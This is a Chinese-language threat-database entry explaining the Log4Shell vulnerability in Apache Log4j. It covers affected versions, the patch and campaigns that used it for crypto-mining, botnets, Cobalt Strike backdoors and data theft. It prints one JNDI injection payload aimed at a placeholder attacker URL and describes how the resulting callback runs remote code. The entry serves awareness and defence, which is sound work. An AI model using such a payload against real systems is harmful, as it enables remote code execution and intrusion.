Threat Database Vulnerability Log4Shell Vulnerability

Log4Shell Vulnerability

2021 年 12 月 10 日,針對基於 Java 的 Apache Log4j 日誌平台中的嚴重漏洞的漏洞利用發布公開。該漏洞被跟踪為 CVE-2021-44228 或 Log4Shell,影響從 Log4j 2.0-beta9 到 2.14.1 的 Log4j 版本。威脅實施者可以利用漏洞來建立未經身份驗證的遠程訪問、執行代碼、傳遞惡意軟件威脅或收集信息。由於 Log4j 被企業應用程序和雲服務廣泛使用,因此該漏洞被指定為嚴重狀態。

Log4Shell 技術細節

攻擊始於威脅參與者更改其 Web 瀏覽器的用戶代理。然後他們訪問一個網站或搜索網站上出現的特定字符串,格式如下:

${jndi:ldap://[attacker_URL]}

因此,該字符串將被添加到 Web 服務器的訪問日誌中。然後攻擊者等待 Log4j 應用程序解析這些日誌並到達附加的字符串。在這種情況下,錯誤將觸發,導致服務器對 JNDI 字符串中存在的 URL 進行回調。該 URL 被濫用來處理 Base64 編碼的命令或 Java 類隨後並在受感染的設備上執行它們。

Apache 迅速發布了一個新版本 - Log4j 2.15.0,以解決和修復漏洞,但大量易受攻擊的系統可能會在很長一段時間內保持未修補狀態。與此同時,攻擊者迅速注意到 Log4Shell 零日漏洞並開始掃描合適的服務器以進行利用。信息安全社區已經跟踪了大量使用 Log4Shell 來提供範圍廣泛的惡意軟件威脅的攻擊活動。

Log4Shell 用於加密礦工、殭屍網絡、後門和數據收集攻擊

其中第一個威脅演員的實施Log4Shell在他們的行動是背後的網絡犯罪分子Kinsing加密挖掘殭屍網絡。黑客使用 Log4Shell 提供 Base64 編碼的有效載荷並運行 shell 腳本。這些腳本的作用是在執行自己的 Kinsing 惡意軟件之前清除目標系統中的競爭性加密挖掘威脅。

Netlab 360 檢測到威脅行為者使用該漏洞在被破壞的設備上安裝 MiraiMuhstik 殭屍網絡版本。這些惡意軟件威脅旨在將受感染的系統添加到物聯網設備和服務器網絡中,然後攻擊者可以指示這些系統發起 DDoS(分佈式拒絕服務)攻擊或部署加密礦工隨後。

據微軟威脅情報中心稱,Log4j 漏洞也是投放 Cobalt Strike 信標的攻擊活動的目標。 Cobalt Strike 是一種合法的軟件工具,用於對公司的安全系統進行滲透測試。然而,它的後門功能使其成為眾多威脅組織的武器庫中的常見部分。之後,對受害者網絡的非法後門訪問被用於提供下一階段的有效載荷,例如勒索軟件、信息竊取者和其他惡意軟件威脅。

Log4Shell 可用於獲取包含服務器數據的環境變量。通過這種方式,攻擊者可以訪問主機名、操作系統名稱、操作系統版本號、運行 Log4j 服務的用戶名等。

熱門

最受關注

加載中...